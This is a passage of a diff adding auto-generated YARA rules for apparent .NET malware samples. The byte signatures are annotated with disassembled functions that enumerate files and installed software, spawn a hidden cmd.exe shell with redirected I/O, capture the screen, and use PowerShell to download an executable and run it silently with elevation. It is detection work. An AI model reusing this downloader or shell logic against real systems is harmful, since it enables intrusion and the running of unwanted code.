ret + */ + $c13 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__13 0x06000035@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete directory + 0B0B 02 ldarg.0 + 0B0C 7b 9e 00 00 04 ldfld _temp_dir1 + 0B11 17 ldc.i4.1 + 0B12 28 53 00 00 0a call System.IO.Directory::Delete + 0B17 2a ret + */ + $c14 = { 02 7B ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__e 0x06000030@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete file + 0A5F 02 ldarg.0 + 0A60 7b 9e 00 00 04 ldfld _temp_dir1 + 0A65 28 51 00 00 0a call System.IO.File::Delete + 0A6A 2a ret + */ + $c15 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 
2A } + /* +function Reqss.Reqss::b__8 0x0600002a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - enumerate files on Windows + 0900 02 ldarg.0 + 0901 7b a0 00 00 04 ldfld dir1 + 0906 6f 4b 00 00 0a callvirt System.IO.DirectoryInfo::GetDirectories + 090B 0b stloc.1 + 090C 16 ldc.i4.0 + 090D 0c stloc.2 + 090E 2b 24 br.s 0x934 + 0910 07 ldloc.1 + 0911 08 ldloc.2 + 0912 9a ldelem.ref + 0913 0a stloc.0 + 0914 02 ldarg.0 + 0915 25 dup + 0916 7b a1 00 00 04 ldfld _res2 + 091B 06 ldloc.0 + 091C 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 0921 72 39 00 00 70 ldstr ":d:0|" + 0926 28 4d 00 00 0a call System.String::Concat + 092B 7d a1 00 00 04 stfld _res2 + 0930 08 ldloc.2 + 0931 17 ldc.i4.1 + 0932 58 add + 0933 0c stloc.2 + 0934 08 ldloc.2 + 0935 07 ldloc.1 + 0936 8e ldlen + 0937 69 conv.i4 + 0938 32 d6 blt.s 0x910 + 093A 2a ret + */ + $c16 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 
2A } + /* +function Reqss.Reqss::b__9 0x0600002b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - enumerate files on Windows + - get file size + 0948 02 ldarg.0 + 0949 7b a0 00 00 04 ldfld dir1 + 094E 6f 4e 00 00 0a callvirt System.IO.DirectoryInfo::GetFiles + 0953 0b stloc.1 + 0954 16 ldc.i4.0 + 0955 0c stloc.2 + 0956 2b 54 br.s 0x9ac + 0958 07 ldloc.1 + 0959 08 ldloc.2 + 095A 9a ldelem.ref + 095B 0a stloc.0 + 095C 02 ldarg.0 + 095D 25 dup + 095E 7b a1 00 00 04 ldfld _res2 + 0963 0d stloc.3 + 0964 1b ldc.i4.5 + 0965 8d 01 00 00 01 newarr System.Object + 096A 13 04 stloc.s local(0x0004) + 096C 11 04 ldloc.s local(0x0004) + 096E 16 ldc.i4.0 + 096F 09 ldloc.3 + 0970 a2 stelem.ref + 0971 11 04 ldloc.s local(0x0004) + 0973 17 ldc.i4.1 + 0974 06 ldloc.0 + 0975 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 097A a2 stelem.ref + 097B 11 04 ldloc.s local(0x0004) + 097D 18 ldc.i4.2 + 097E 72 45 00 00 70 ldstr ":f:" + 0983 a2 stelem.ref + 0984 11 04 ldloc.s local(0x0004) + 0986 19 ldc.i4.3 + 0987 06 ldloc.0 + 0988 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 098D 8c 31 00 00 01 box System.Int64 + 0992 a2 stelem.ref + 0993 11 04 ldloc.s local(0x0004) + 0995 1a ldc.i4.4 + 0996 72 23 00 00 70 ldstr "|" + 099B a2 stelem.ref + 099C 11 04 ldloc.s local(0x0004) + 099E 28 49 00 00 0a call System.String::Concat + 09A3 7d a1 00 00 04 stfld _res2 + 09A8 08 ldloc.2 + 09A9 17 ldc.i4.1 + 09AA 58 add + 09AB 0c stloc.2 + 09AC 08 ldloc.2 + 09AD 07 ldloc.1 + 09AE 8e ldlen + 09AF 69 conv.i4 + 09B0 32 a6 blt.s 0x958 + 09B2 2a ret + */ + $c17 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 0D 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 09 A2 11 ?? 17 06 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 06 6F ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 
2A } + /* +function Shll.ShellEx::ctor 0x06000081@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create a process with modified I/O handles and window + 21F0 14 ldnull + 21F1 0a stloc.0 + 21F2 14 ldnull + 21F3 0b stloc.1 + 21F4 14 ldnull + 21F5 0c stloc.2 + 21F6 02 ldarg.0 + 21F7 72 01 00 00 70 ldstr "" + 21FC 7d 83 00 00 04 stfld _lastLineOut + 2201 02 ldarg.0 + 2202 72 01 00 00 70 ldstr "" + 2207 7d 87 00 00 04 stfld _adm_token + 220C 02 ldarg.0 + 220D 28 0f 00 00 0a call System.Object::.ctor + 2212 02 ldarg.0 + 2213 17 ldc.i4.1 + 2214 7d 81 00 00 04 stfld __isRunning + 2219 02 ldarg.0 + 221A 73 58 00 00 0a newobj System.Diagnostics.Process::.ctor + 221F 7d 7d 00 00 04 stfld __ps + 2224 02 ldarg.0 + 2225 73 55 00 00 0a newobj System.Diagnostics.ProcessStartInfo::.ctor + 222A 7d 7e 00 00 04 stfld __psi + 222F 02 ldarg.0 + 2230 7b 7e 00 00 04 ldfld __psi + 2235 72 45 01 00 70 ldstr "C:\Windows\System32\cmd.exe" + 223A 6f 56 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_FileName + 223F 02 ldarg.0 + 2240 7b 7e 00 00 04 ldfld __psi + 2245 17 ldc.i4.1 + 2246 6f 6d 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardInput + 224B 02 ldarg.0 + 224C 7b 7e 00 00 04 ldfld __psi + 2251 17 ldc.i4.1 + 2252 6f 6e 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput + 2257 02 ldarg.0 + 2258 7b 7e 00 00 04 ldfld __psi + 225D 17 ldc.i4.1 + 225E 6f 6f 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardError + 2263 02 ldarg.0 + 2264 7b 7e 00 00 04 ldfld __psi + 2269 16 ldc.i4.0 + 226A 6f 70 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_UseShellExecute + 226F 02 ldarg.0 + 2270 7b 7e 00 00 04 ldfld __psi + 2275 17 ldc.i4.1 + 2276 6f 71 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_CreateNoWindow + 227B 02 ldarg.0 + 227C 7b 7e 00 00 04 ldfld __psi + 2281 72 4d 00 00 70 ldstr "C:\" + 2286 6f 57 00 00 0a callvirt 
System.Diagnostics.ProcessStartInfo::set_WorkingDirectory + 228B 02 ldarg.0 + 228C 7b 7d 00 00 04 ldfld __ps + 2291 02 ldarg.0 + 2292 7b 7e 00 00 04 ldfld __psi + 2297 6f 59 00 00 0a callvirt System.Diagnostics.Process::set_StartInfo + 229C 02 ldarg.0 + 229D 7b 7d 00 00 04 ldfld __ps + 22A2 6f 5a 00 00 0a callvirt System.Diagnostics.Process::Start + 22A7 26 pop + 22A8 02 ldarg.0 + 22A9 06 ldloc.0 + 22AA 2d 0d brtrue.s 0x22b9 + 22AC 02 ldarg.0 + 22AD fe 06 84 00 00 06 ldftn <.ctor>b__0 + 22B3 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22B8 0a stloc.0 + 22B9 06 ldloc.0 + 22BA 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22BF 7d 7f 00 00 04 stfld __t1 + 22C4 02 ldarg.0 + 22C5 7b 7f 00 00 04 ldfld __t1 + 22CA 02 ldarg.0 + 22CB 7b 7d 00 00 04 ldfld __ps + 22D0 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 22D5 02 ldarg.0 + 22D6 07 ldloc.1 + 22D7 2d 0d brtrue.s 0x22e6 + 22D9 02 ldarg.0 + 22DA fe 06 85 00 00 06 ldftn <.ctor>b__1 + 22E0 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22E5 0b stloc.1 + 22E6 07 ldloc.1 + 22E7 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22EC 7d 80 00 00 04 stfld __t2 + 22F1 02 ldarg.0 + 22F2 7b 80 00 00 04 ldfld __t2 + 22F7 02 ldarg.0 + 22F8 7b 7d 00 00 04 ldfld __ps + 22FD 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 2302 02 ldarg.0 + 2303 73 75 00 00 0a newobj System.Timers.Timer::.ctor + 2308 7d 84 00 00 04 stfld _timer + 230D 02 ldarg.0 + 230E 7b 84 00 00 04 ldfld _timer + 2313 23 00 00 00 00 00 40 59 40ldc.r8 101.0 + 231C 6f 76 00 00 0a callvirt System.Timers.Timer::set_Interval + 2321 02 ldarg.0 + 2322 7b 84 00 00 04 ldfld _timer + 2327 08 ldloc.2 + 2328 2d 0d brtrue.s 0x2337 + 232A 02 ldarg.0 + 232B fe 06 86 00 00 06 ldftn <.ctor>b__2 + 2331 73 77 00 00 0a newobj System.Timers.ElapsedEventHandler::.ctor + 2336 0c stloc.2 + 2337 08 ldloc.2 + 2338 6f 78 00 00 0a callvirt System.Timers.Timer::add_Elapsed + 233D 02 ldarg.0 + 233E 7b 84 00 00 
04 ldfld _timer + 2343 17 ldc.i4.1 + 2344 6f 79 00 00 0a callvirt System.Timers.Timer::set_Enabled + 2349 2a ret + */ + $c18 = { 14 0A 14 0B 14 0C 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 06 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 07 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 08 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__42 0x06000062@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - query or enumerate registry key + 112B 02 ldarg.0 + 112C 7e 5b 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 1131 72 55 00 00 70 ldstr "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" + 1136 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 113B 7d a6 00 00 04 stfld _temp_key_ + 1140 2a ret + */ + $c19 = { 02 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 
2A } + /* +function Reqss.Reqss::b__43 0x06000063@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - query or enumerate registry key + - query or enumerate registry value + 1150 02 ldarg.0 + 1151 7b a6 00 00 04 ldfld _temp_key_ + 1156 6f 5d 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetSubKeyNames + 115B 0c stloc.2 + 115C 16 ldc.i4.0 + 115D 0d stloc.3 + 115E 38 a5 00 00 00 br 0x1208 + 1163 08 ldloc.2 + 1164 09 ldloc.3 + 1165 9a ldelem.ref + 1166 0a stloc.0 + 1167 02 ldarg.0 + 1168 7b a6 00 00 04 ldfld _temp_key_ + 116D 06 ldloc.0 + 116E 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 1173 0b stloc.1 + 1174 02 ldarg.0 + 1175 25 dup + 1176 7b a1 00 00 04 ldfld _res2 + 117B 13 04 stloc.s local(0x0004) + 117D 1f 09 ldc.i4.s 0x9 + 117F 8d 01 00 00 01 newarr System.Object + 1184 13 05 stloc.s local(0x0005) + 1186 11 05 ldloc.s local(0x0005) + 1188 16 ldc.i4.0 + 1189 11 04 ldloc.s local(0x0004) + 118B a2 stelem.ref + 118C 11 05 ldloc.s local(0x0005) + 118E 17 ldc.i4.1 + 118F 07 ldloc.1 + 1190 72 bd 00 00 70 ldstr "DisplayName" + 1195 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 119A a2 stelem.ref + 119B 11 05 ldloc.s local(0x0005) + 119D 18 ldc.i4.2 + 119E 72 d5 00 00 70 ldstr "_;;;" + 11A3 a2 stelem.ref + 11A4 11 05 ldloc.s local(0x0005) + 11A6 19 ldc.i4.3 + 11A7 07 ldloc.1 + 11A8 72 df 00 00 70 ldstr "DisplayVersion" + 11AD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11B2 a2 stelem.ref + 11B3 11 05 ldloc.s local(0x0005) + 11B5 1a ldc.i4.4 + 11B6 72 d5 00 00 70 ldstr "_;;;" + 11BB a2 stelem.ref + 11BC 11 05 ldloc.s local(0x0005) + 11BE 1b ldc.i4.5 + 11BF 07 ldloc.1 + 11C0 72 fd 00 00 70 ldstr "InstallDate" + 11C5 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11CA a2 stelem.ref + 11CB 11 05 ldloc.s local(0x0005) + 11CD 1c ldc.i4.6 + 11CE 72 d5 00 00 70 ldstr "_;;;" + 11D3 a2 stelem.ref + 11D4 11 05 ldloc.s local(0x0005) + 11D6 1d ldc.i4.7 + 11D7 07 ldloc.1 + 11D8 72 15 01 00 70 ldstr 
"Publisher" + 11DD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11E2 a2 stelem.ref + 11E3 11 05 ldloc.s local(0x0005) + 11E5 1e ldc.i4.8 + 11E6 72 29 01 00 70 ldstr "_|" + 11EB a2 stelem.ref + 11EC 11 05 ldloc.s local(0x0005) + 11EE 28 49 00 00 0a call System.String::Concat + 11F3 7d a1 00 00 04 stfld _res2 + 11F8 de 0a leave.s 0x1204 + 11FA 07 ldloc.1 + 11FB 2c 06 brfalse.s 0x1203 + 11FD 07 ldloc.1 + 11FE 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 1203 dc endfinally + 1204 09 ldloc.3 + 1205 17 ldc.i4.1 + 1206 58 add + 1207 0d stloc.3 + 1208 09 ldloc.3 + 1209 08 ldloc.2 + 120A 8e ldlen + 120B 69 conv.i4 + 120C 3f 52 ff ff ff blt 0x1163 + 1211 2a ret + */ + $c20 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 16 0D 38 ?? ?? ?? ?? 08 09 9A 0A 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0B 02 25 7B ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 11 ?? 17 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 09 17 58 0D 09 08 8E 69 3F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureScreen 0x06000072@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - unmanaged call + 1F5A 02 ldarg.0 + 1F5B 28 7c 00 00 06 call GetDesktopWindow + 1F60 28 73 00 00 06 call CaptureWindow + 1F65 2a ret + */ + $c21 = { 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 
2A } + condition: + all of them +} + +rule super_rule_692f7 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "692f7fd6d198e804d6af98eb9e390d61" + strings: + /* +function RunFixExe.Program::Main 0x06000003@692f7fd6d198e804d6af98eb9e390d61 with 7 features: + - check if directory exists + - check if file exists + - create directory + - manipulate console buffer + - query or enumerate registry key + - read file on Windows + - unmanaged call + 025C 00 nop + 025D 00 nop + 025E 28 02 00 00 06 call GetConsoleWindow + 0263 0a stloc.0 + 0264 06 ldloc.0 + 0265 16 ldc.i4.0 + 0266 28 01 00 00 06 call ShowWindow + 026B 26 pop + 026C 72 01 00 00 70 ldstr "config.txt" + 0271 28 0f 00 00 0a call System.IO.File::ReadAllLines + 0276 0b stloc.1 + 0277 7e 10 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 027C 72 17 00 00 70 ldstr "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" + 0281 17 ldc.i4.1 + 0282 6f 11 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 0287 0c stloc.2 + 0288 08 ldloc.2 + 0289 14 ldnull + 028A fe 01 ceq + 028C 0d stloc.3 + 028D 09 ldloc.3 + 028E 2c 27 brfalse.s 0x2b7 + 0290 00 nop + 0291 7e 10 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 0296 72 95 00 00 70 ldstr "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" + 029B 6f 12 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 02A0 0c stloc.2 + 02A1 08 ldloc.2 + 02A2 14 ldnull + 02A3 fe 01 ceq + 02A5 13 04 stloc.s local(0x0004) + 02A7 11 04 ldloc.s local(0x0004) + 02A9 2c 0b brfalse.s 0x2b6 + 02AB 00 nop + 02AC 07 ldloc.1 + 02AD 16 ldc.i4.0 + 02AE 9a ldelem.ref + 02AF 28 04 00 00 06 call DeployApplications + 02B4 00 nop + 02B5 00 nop + 02B6 00 nop + 02B7 72 2c 01 00 70 ldstr "C:\Windows\servicing\fix.exe" + 02BC 28 13 00 00 0a call System.IO.File::Exists + 02C1 13 05 stloc.s local(0x0005) + 02C3 11 05 ldloc.s local(0x0005) + 02C5 2c 0f brfalse.s 0x2d6 + 02C7 
00 nop + 02C8 72 2c 01 00 70 ldstr "C:\Windows\servicing\fix.exe" + 02CD 28 14 00 00 0a call System.Diagnostics.Process::Start + 02D2 26 pop + 02D3 00 nop + 02D4 2b 38 br.s 0x30e + 02D6 00 nop + 02D7 72 66 01 00 70 ldstr "C:\Windows\servicing" + 02DC 28 15 00 00 0a call System.IO.Directory::Exists + 02E1 16 ldc.i4.0 + 02E2 fe 01 ceq + 02E4 13 07 stloc.s local(0x0007) + 02E6 11 07 ldloc.s local(0x0007) + 02E8 2c 0b brfalse.s 0x2f5 + 02EA 72 66 01 00 70 ldstr "C:\Windows\servicing" + 02EF 28 16 00 00 0a call System.IO.Directory::CreateDirectory + 02F4 26 pop + 02F5 07 ldloc.1 + 02F6 17 ldc.i4.1 + 02F7 9a ldelem.ref + 02F8 13 06 stloc.s local(0x0006) + 02FA 11 06 ldloc.s local(0x0006) + 02FC 28 05 00 00 06 call DownloadApplications + 0301 00 nop + 0302 72 2c 01 00 70 ldstr "C:\Windows\servicing\fix.exe" + 0307 28 14 00 00 0a call System.Diagnostics.Process::Start + 030C 26 pop + 030D 00 nop + 030E 00 nop + 030F de 13 leave.s 0x324 + 0311 13 08 stloc.s local(0x0008) + 0313 00 nop + 0314 11 08 ldloc.s local(0x0008) + 0316 6f 17 00 00 0a callvirt System.Exception::get_Message + 031B 28 18 00 00 0a call System.Console::WriteLine + 0320 00 nop + 0321 00 nop + 0322 de 00 leave.s 0x324 + 0324 2a ret + */ + $c22 = { 00 00 28 ?? ?? ?? ?? 0A 06 16 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0C 08 14 FE 01 0D 09 2C ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 14 FE 01 13 ?? 11 ?? 2C ?? 00 07 16 9A 28 ?? ?? ?? ?? 00 00 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00 2B ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 07 17 9A 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 
2A } + /* +function RunFixExe.Program::DeployApplications 0x06000004@692f7fd6d198e804d6af98eb9e390d61 with 2 features: + - manipulate console buffer + - run PowerShell expression + 0344 00 nop + 0345 14 ldnull + 0346 0a stloc.0 + 0347 72 90 01 00 70 ldstr " " + 034C 28 18 00 00 0a call System.Console::WriteLine + 0351 00 nop + 0352 72 94 01 00 70 ldstr "Deploying application..." + 0357 28 18 00 00 0a call System.Console::WriteLine + 035C 00 nop + 035D 00 nop + 035E 28 19 00 00 0a call System.Management.Automation.PowerShell::Create + 0363 25 dup + 0364 0a stloc.0 + 0365 0b stloc.1 + 0366 00 nop + 0367 06 ldloc.0 + 0368 72 c6 01 00 70 ldstr "$Path = $env:TEMP; $Installer = "chrome_installer.exe"; Invoke-WebRequest "" + 036D 02 ldarg.0 + 036E 72 5f 02 00 70 ldstr "" -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait; Remove-Item $Path\$Installer" + 0373 28 1a 00 00 0a call System.String::Concat + 0378 6f 1b 00 00 0a callvirt System.Management.Automation.PowerShell::AddScript + 037D 26 pop + 037E 06 ldloc.0 + 037F 6f 1c 00 00 0a callvirt System.Management.Automation.PowerShell::Invoke + 0384 0c stloc.2 + 0385 00 nop + 0386 08 ldloc.2 + 0387 6f 1d 00 00 0a callvirt GetEnumerator + 038C 0d stloc.3 + 038D 2b 4a br.s 0x3d9 + 038F 09 ldloc.3 + 0390 6f 1e 00 00 0a callvirt get_Current + 0395 13 04 stloc.s local(0x0004) + 0397 00 nop + 0398 11 04 ldloc.s local(0x0004) + 039A 14 ldnull + 039B fe 03 cgt.un + 039D 13 05 stloc.s local(0x0005) + 039F 11 05 ldloc.s local(0x0005) + 03A1 2c 35 brfalse.s 0x3d8 + 03A3 00 nop + 03A4 11 04 ldloc.s local(0x0004) + 03A6 6f 1f 00 00 0a callvirt System.Management.Automation.PSObject::get_BaseObject + 03AB 6f 20 00 00 0a callvirt System.Object::GetType + 03B0 6f 21 00 00 0a callvirt System.Type::get_FullName + 03B5 28 18 00 00 0a call System.Console::WriteLine + 03BA 00 nop + 03BB 11 04 ldloc.s local(0x0004) + 03BD 6f 1f 00 00 0a callvirt 
System.Management.Automation.PSObject::get_BaseObject + 03C2 6f 22 00 00 0a callvirt System.Object::ToString + 03C7 72 7e 03 00 70 ldstr " + " + 03CC 28 23 00 00 0a call System.String::Concat + 03D1 28 18 00 00 0a call System.Console::WriteLine + 03D6 00 nop + 03D7 00 nop + 03D8 00 nop + 03D9 09 ldloc.3 + 03DA 6f 24 00 00 0a callvirt System.Collections.IEnumerator::MoveNext + 03DF 2d ae brtrue.s 0x38f + 03E1 de 0b leave.s 0x3ee + 03E3 09 ldloc.3 + 03E4 2c 07 brfalse.s 0x3ed + 03E6 09 ldloc.3 + 03E7 6f 25 00 00 0a callvirt System.IDisposable::Dispose + 03EC 00 nop + 03ED dc endfinally + 03EE 06 ldloc.0 + 03EF 6f 26 00 00 0a callvirt System.Management.Automation.PowerShell::get_Streams + 03F4 6f 27 00 00 0a callvirt System.Management.Automation.PSDataStreams::get_Error + 03F9 6f 28 00 00 0a callvirt get_Count + 03FE 16 ldc.i4.0 + 03FF fe 02 cgt + 0401 13 06 stloc.s local(0x0006) + 0403 11 06 ldloc.s local(0x0006) + 0405 2c 28 brfalse.s 0x42f + 0407 00 nop + 0408 06 ldloc.0 + 0409 6f 26 00 00 0a callvirt System.Management.Automation.PowerShell::get_Streams + 040E 6f 27 00 00 0a callvirt System.Management.Automation.PSDataStreams::get_Error + 0413 28 01 00 00 2b call [CLR_METADATA_TABLE_GENERICMETHOD] + 0x28C0 0x0 Method_CodedIndex: 0x53 + 0x28C2 0x2 Instantiation_BlobIndex: 0xEA + 0418 6f 22 00 00 0a callvirt System.Object::ToString + 041D 13 07 stloc.s local(0x0007) + 041F 72 82 03 00 70 ldstr "Error: {0}" + 0424 11 07 ldloc.s local(0x0007) + 0426 28 2a 00 00 0a call System.Console::WriteLine + 042B 00 nop + 042C 00 nop + 042D 2b 0b br.s 0x43a + 042F 72 98 03 00 70 ldstr "Installation has completed successfully." 
+ 0434 28 18 00 00 0a call System.Console::WriteLine + 0439 00 nop + 043A 00 nop + 043B de 0b leave.s 0x448 + 043D 07 ldloc.1 + 043E 2c 07 brfalse.s 0x447 + 0440 07 ldloc.1 + 0441 6f 25 00 00 0a callvirt System.IDisposable::Dispose + 0446 00 nop + 0447 dc endfinally + 0448 00 nop + 0449 de 18 leave.s 0x463 + 044B 13 08 stloc.s local(0x0008) + 044D 00 nop + 044E 72 ea 03 00 70 ldstr "Error occured: {0}" + 0453 11 08 ldloc.s local(0x0008) + 0455 6f 2b 00 00 0a callvirt System.Exception::get_InnerException + 045A 28 2a 00 00 0a call System.Console::WriteLine + 045F 00 nop + 0460 00 nop + 0461 de 00 leave.s 0x463 + 0463 de 14 leave.s 0x479 + 0465 00 nop + 0466 06 ldloc.0 + 0467 14 ldnull + 0468 fe 03 cgt.un + 046A 13 09 stloc.s local(0x0009) + 046C 11 09 ldloc.s local(0x0009) + 046E 2c 07 brfalse.s 0x477 + 0470 06 ldloc.0 + 0471 6f 2c 00 00 0a callvirt System.Management.Automation.PowerShell::Dispose + 0476 00 nop + 0477 00 nop + 0478 dc endfinally + 0479 2a ret + */ + $c23 = { 00 14 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 25 0A 0B 00 06 72 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 0C 00 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 14 FE 03 13 ?? 11 ?? 2C ?? 00 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 13 ?? 11 ?? 2C ?? 00 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? 